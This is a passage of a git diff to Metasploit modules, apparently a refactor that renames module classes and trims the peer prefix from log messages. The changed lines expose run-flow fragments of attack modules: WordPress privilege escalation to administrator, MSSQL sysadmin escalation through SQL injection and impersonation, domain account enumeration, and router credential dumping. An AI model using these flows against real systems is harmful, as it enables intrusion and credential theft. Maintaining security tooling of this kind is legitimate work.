WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address') end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations') end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to set the default user role') end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb index ec3ce10323..d920351496 100644 --- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb +++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb index 6c8f0d29c3..a9ed6fac2d 100644 --- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb +++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Kerberos::Client diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 27b931c1a7..fb9f275d2f 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 0ef51aa38a..e52ab58061 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to connect and check endianess...") + print_status("Attempting to connect and check endianess...") @endianess = fingerprint_endian @credentials = {} @@ -72,18 +72,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to check endianess, aborting...") return end - print_good("#{peer} - #{string_endianess} device found...") + print_good("#{string_endianess} device found...") - print_status("#{peer} - Attempting to connect and dump configuration...") + print_status("Attempting to connect and dump configuration...") config = dump_configuration if config.nil? - print_status("#{peer} - Error retrieving configuration, aborting...") + print_status("Error retrieving configuration, aborting...") return end loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations") - print_status("#{peer} - Router configuration dump stored in: #{loot_file}") + print_status("Router configuration dump stored in: #{loot_file}") parse_configuration(config[:data]) end @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary disconnect if res.blank? - vprint_error("#{peer} - No answer...") + vprint_error("No answer...") return end @@ -186,17 +186,17 @@ class Metasploit3 < Msf::Auxiliary end unless mark == 0x4d4d6353 - vprint_error("#{peer} - Incorrect mark when reading response") + vprint_error("Incorrect mark when reading response") return nil end unless zero == 0 - vprint_error("#{peer} - Incorrect zero when reading response") + vprint_error("Incorrect zero when reading response") return nil end unless length == data.length - vprint_warning("#{peer} - Inconsistent length / data packet") + vprint_warning("Inconsistent length / data packet") # return nil end @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary @credentials.each do |k,v| next unless v[:user] and v[:password] - print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + print_status("#{k}: User: #{v[:user]} Pass: #{v[:password]}") report_cred( ip: rhost, port: rport, @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{peer} - #{regex[0]}: #{value}") + print_status("#{regex[0]}: #{value}") end end end diff --git a/modules/auxiliary/admin/misc/wol.rb b/modules/auxiliary/admin/misc/wol.rb index 8afcd0100e..276d8fe96d 100644 --- a/modules/auxiliary/admin/misc/wol.rb +++ b/modules/auxiliary/admin/misc/wol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 187b8a7d25..2b0f191a33 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index d067729154..326a510db4 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b7272a17cc..cd0ff5e1ec 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - if mssql_login_datastore == false + if !mssql_login_datastore print_error("Login was unsuccessful. Check your credentials.") disconnect return diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb index 27ad860676..dd4f419e52 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 83a8d2d1ec..aef9b655ff 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report @@ -39,49 +39,49 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Grabbing the SQL Server name and domain...") + print_status("Grabbing the SQL Server name and domain...") db_server_name = get_server_name if db_server_name.nil? - print_error("#{peer} - Unable to grab the server name") + print_error("Unable to grab the server name") return else - print_good("#{peer} - Server name: #{db_server_name}") + print_good("Server name: #{db_server_name}") end db_domain_name = get_domain_name if db_domain_name.nil? - print_error("#{peer} - Unable to grab domain name") + print_error("Unable to grab domain name") return end # Check if server is on a domain if db_server_name == db_domain_name - print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain") + print_error("The SQL Server does not appear to be part of a Windows domain") return else - print_good("#{peer} - Domain name: #{db_domain_name}") + print_good("Domain name: #{db_domain_name}") end - print_status("#{peer} - Grabbing the SID for the domain...") + print_status("Grabbing the SID for the domain...") windows_domain_sid = get_windows_domain_sid(db_domain_name) if windows_domain_sid.nil? - print_error("#{peer} - Could not recover the SQL Server's domain sid.") + print_error("Could not recover the SQL Server's domain sid.") return else - print_good("#{peer} - Domain sid: #{windows_domain_sid}") + print_good("Domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() total_rids = datastore['END_RID'] - datastore['START_RID'] - print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...") + print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...") domain_users = get_win_domain_users(windows_domain_sid) if domain_users.nil? - print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.") + print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.") return end # Print number of objects found and write to a file - print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.") + print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.") # Create table for report windows_domain_login_table = Rex::Ui::Text::Table.new( @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary (datastore['START_RID']..datastore['END_RID']).each do |principal_id| rid_diff = principal_id - datastore['START_RID'] if principal_id % 100 == 0 - print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete") + print_status("#{rid_diff} of #{total_rids } RID queries complete") end user_sid = build_user_sid(domain_sid, principal_id) @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary unless windows_login.empty? || windows_logins.include?(windows_login) windows_logins.push(windows_login) - print_good("#{peer} - #{windows_login}") + print_good(" #{windows_login}") end end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index dd90b59eef..be1343ef33 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb index f691a81169..254d745a02 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 320c1850a6..979886b01e 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report @@ -30,62 +30,62 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name from ...") + print_status("Grabbing the database user name from ...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no esclation needed.") + print_error("#{db_user} is already a sysadmin, no esclation needed.") return else - print_good("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Check for trusted databases owned by sysadmins - print_status("#{peer} - Checking for trusted databases owned by sysadmins...") + print_status("Checking for trusted databases owned by sysadmins...") trust_db_list = check_trust_dbs if trust_db_list.nil? || trust_db_list.length == 0 - print_error("#{peer} - No databases owned by sysadmin were found flagged as trustworthy.") + print_error("No databases owned by sysadmin were found flagged as trustworthy.") return else # Display list of accessible databases to user - print_good("#{peer} - #{trust_db_list.length} affected database(s) were found:") + print_good("#{trust_db_list.length} affected database(s) were found:") trust_db_list.each do |db| print_status(" - #{db}") end end # Check if the user has the db_owner role in any of the databases - print_status("#{peer} - Checking if #{db_user} has the db_owner role in any of them...") + print_status("Checking if #{db_user} has the db_owner role in any of them...") owner_status = check_db_owner(trust_db_list) if owner_status.nil? - print_error("#{peer} - Fail buckets, the user doesn't have db_owner role anywhere.") + print_error("Fail buckets, the user doesn't have db_owner role anywhere.") return else - print_good("#{peer} - #{db_user} has the db_owner role on #{owner_status}.") + print_good("#{db_user} has the db_owner role on #{owner_status}.") end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to add #{db_user} to sysadmin role...") + print_status("Attempting to add #{db_user} to sysadmin role...") escalate_privs(owner_status, db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index bd5d6ade57..4862f91e68 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 346efa1109..e47f479dc2 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report @@ -28,60 +28,60 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name...") + print_status("Grabbing the database user name...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.") + print_error("#{db_user} is already a sysadmin, no escalation needed.") return else - print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_status("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Get list of users that can be impersonated - print_status("#{peer} - Enumerating a list of users that can be impersonated...") + print_status("Enumerating a list of users that can be impersonated...") imp_user_list = check_imp_users if imp_user_list.nil? || imp_user_list.empty? - print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.") + print_error("Sorry, the current user doesnt have permissions to impersonate anyone.") return else # Display list of users that can be impersonated - print_good("#{peer} - #{imp_user_list.length} users can be impersonated:") + print_good("#{imp_user_list.length} users can be impersonated:") imp_user_list.each do |dbuser| - print_status("#{peer} - #{dbuser}") + print_status(" #{dbuser}") end end # Check if any of the users that can be impersonated are sysadmins - print_status("#{peer} - Checking if any of them are sysadmins...") + print_status("Checking if any of them are sysadmins...") imp_user_sysadmin = check_imp_sysadmin(imp_user_list) if imp_user_sysadmin.nil? - print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.") + print_error("Sorry, none of the users that can be impersonated are sysadmins.") return end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...") + print_status("Attempting to impersonate #{imp_user_sysadmin}...") escalate_privs(imp_user_sysadmin,db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary # check if user is a sysadmin if parsed_result && parsed_result[0] == '1' - print_good("#{peer} - #{imp_user} is a sysadmin!") + print_good(" #{imp_user} is a sysadmin!") return imp_user else - print_status("#{peer} - #{imp_user} is NOT a sysadmin") + print_status(" #{imp_user} is NOT a sysadmin") end end diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index c81ae1b467..bd8f29568e 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 976ce09e8b..457af07b52 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']), - OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']), + OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]), ], self.class) end diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index f97100c2e9..262375cd2f 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 689739c228..117abf5007 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 4b4c796a25..446dea3009 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 0ace058218..c6b54c2c7a 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 8c64f49cca..8cfa8c907b 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 5bb0e6830f..f4c7d52c2a 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 56578fa36f..e8dfd5f1ad 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index 731a58e444..07010cf1bc 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 8ec139cec0..07f3cc5b19 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index c9b9faccbb..4d5d54817d 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index e33a0db012..851ce5950a 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index ee9efbb905..1a49166ddc 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 44e67f20d0..944e24c56a 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 581c65d9ac..2aa1311ec6 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 94a16f0d72..db6cfd7896 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index d9355644a7..fae25f3308 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index c5f9453f72..0e3e355eab 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index a9140ed59d..b22eb782cb 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index d7e50deacb..6a45802bf0 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 61c7a66ec0..ef2a7e452b 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d8e837f799..ba24fc2314 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index fa3abf8d31..2f2dd5bbd8 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include 